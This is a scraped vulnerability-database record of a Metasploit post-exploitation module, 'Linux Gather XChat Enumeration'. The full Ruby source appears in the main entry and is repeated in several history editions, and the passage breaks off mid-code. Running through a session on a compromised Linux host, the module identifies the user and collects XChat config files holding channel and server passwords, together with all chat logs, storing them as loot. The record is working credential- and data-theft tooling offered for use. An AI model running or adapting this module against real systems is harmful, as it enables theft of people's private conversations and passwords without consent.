{"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-07-24T13:26:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {"vulnersScore": 5.0}, "_object_type": "robots.models.metasploit.MetasploitBulletin", "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2018-01-20T22:06:33", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [{"edition": 1, "bulletin": {"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\n\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-05-03T20:42:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-07-02T23:41:21", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "sourceData"], "lastseen": "2017-07-02T23:41:21"}, {"edition": 2, "bulletin": {"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-07-24T13:26:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-07-24T19:31:25", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["href"], "lastseen": "2017-07-24T19:31:25"}, {"edition": 3, "bulletin": {"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-07-24T13:26:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-08-21T15:32:39", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2017-08-21T15:32:39"}, {"edition": 4, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "1976-01-01T00:00:00", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-10-21T07:42:40", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2017-10-21T07:42:40"}, {"edition": 5, "bulletin": {"published": "2012-03-31T05:15:21", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "references": [], "modified": "2017-07-24T13:26:21", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "enchantments": {"score": {"modified": "2017-10-22T03:44:44", "value": 3.6}}, "id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "metasploitReliability": "Normal", "enchantments_done": [], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Linux Gather XChat Enumeration", "viewCount": 0, "lastseen": "2017-10-22T03:44:44", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "cvelist": [], "objectVersion": "1.4", "history": [], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, "differentElements": ["modified", "published"], "lastseen": "2017-10-22T03:44:44"}, {"edition": 6, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => 